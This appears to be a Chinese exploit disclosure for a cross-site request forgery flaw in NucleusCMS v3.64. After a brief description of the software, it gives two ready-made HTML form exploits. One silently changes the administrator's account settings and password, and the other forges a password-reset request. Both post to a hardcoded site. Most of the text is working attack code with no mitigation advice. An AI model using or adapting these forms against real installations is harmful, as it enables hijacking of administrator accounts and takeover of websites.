By:追心
漏洞说明:
Nucleus是一个用于管理一个或多个blog的工具。它采用PHP4开发并需要MySQL数据库支持。Nucleus具有支持多个写作者,支持先预览 再提交,内置评论与投票系统,自动归档与全文搜索功能,支持RSS/Atom,文件/图片上传,IP过滤,数据库内容备份和恢复等。此外还可通过插件对其 进行扩展。NucleusCMS v3.64存在CSRF跨站请求伪造漏洞,该漏洞导致修改管理配置。
漏洞类型:
CSRF、跨站请求伪造
修改管理配置CSRF EXP:
<div>
<h3>修改管理配置CSRF EXP</h3>
<form method="post" action="https://lcx.cc/index.php" name="memberedit"><div>
<input type="hidden" name="action" value="changemembersettings" />
<input type="hidden" name="memberid" value="1" />
<table><tr><td>
<td><input name="name" value="admin" /></td>
<td><input name="realname" value="KedAns-Dz" /></td>
<td><input type="password" name="password" /></td>
<td><input type="password" name="repeatpassword" /></td>
<td><input name="email" value="ked-h@1337day.com" /></td>
<td><input name="url" value="http://1337day.com" /></td>
</table></tr></td>
<input type="submit" value="Submit" />
</form>
</div>
修改管理密码CSRF EXP:
<div>
<h3>修改管理配置CSRF EXP</h3>
<form action="https://lcx.cc/index.php" method="post">
<input type="hidden" name="action" value="activatesetpwd" />
<input type="hidden" name="key" value="1" />
<table><tr>
<td><input type="password" name="password" /></td>
<td><input type="password" name="repeatpassword" /></td>
</tr></table>
<td><input type='submit' value='Submit' /></td>
</form>
</div>